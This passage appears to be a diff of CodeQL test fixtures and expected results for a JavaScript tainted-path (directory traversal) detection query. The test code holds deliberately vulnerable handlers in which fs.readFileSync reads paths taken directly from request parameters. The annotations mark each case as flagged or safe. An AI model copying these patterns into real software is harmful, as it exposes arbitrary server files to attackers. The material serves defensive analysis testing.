normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. 
| normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | -| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:208:21:208:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. 
| normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | -| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | -| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | -| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | -| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. 
| normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | -| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. 
| normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | -| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | -| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | -| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. 
| normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | -| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | -| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | -| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | -| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | -| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. 
| other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | -| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. 
| other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | -| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. 
| other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | -| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | -| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | -| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | -| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. 
| prettier.js:6:13:6:13 | p | user-provided value | -| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | -| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | -| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. 
| tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | -| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | -| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | -| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. 
| tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | -| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. 
| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | -| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | -| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. 
| typescript.ts:9:24:9:30 | req.url | user-provided value | -| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js index fd768fecfff8..ba57e930f03f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.js 
@@ -6,65 +6,54 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system - // BAD: This could still read any file on the file system - res.write(fs.readFileSync("/home/user/" + path)); + res.write(fs.readFileSync("/home/user/" + path)); // $ Alert - This could still read any file on the file system if (path.startsWith("/home/user/")) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path.indexOf("secret") == -1) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (fs.existsSync(path)) - res.write(fs.readFileSync(path)); // BAD: Insufficient sanitisation + res.write(fs.readFileSync(path)); // $ Alert - Insufficient sanitisation if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list if (path === 'foo.txt' || path === 'bar.txt' || someOpaqueCondition()) - res.write(fs.readFileSync(path)); // BAD: Path is incompletely compared to white-list + res.write(fs.readFileSync(path)); // $ Alert - Path is incompletely compared to white-list path = sanitize(path); - res.write(fs.readFileSync(path)); // GOOD: Path is sanitized + res.write(fs.readFileSync(path)); // OK - Path is sanitized - path = url.parse(req.url, true).query.path; - // GOOD: basename is safe + 
path = url.parse(req.url, true).query.path; // $ Source + // OK - basename is safe res.write(fs.readFileSync(pathModule.basename(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.dirname(path))); - // GOOD: extname is safe + res.write(fs.readFileSync(pathModule.dirname(path))); // $ Alert - taint is preserved + // OK - extname is safe res.write(fs.readFileSync(pathModule.extname(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.join(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.normalize(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(x, path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.relative(path, x))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(path))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); - // BAD: taint is preserved - res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); + res.write(fs.readFileSync(pathModule.join(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.join(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.normalize(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(x, path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.relative(path, x))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(path))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.resolve(x, y, path, z))); // $ Alert - taint is preserved + res.write(fs.readFileSync(pathModule.toNamespacedPath(path))); // $ Alert - taint is preserved }); var server = http.createServer(function(req, res) { // tests for a few uri-libraries - 
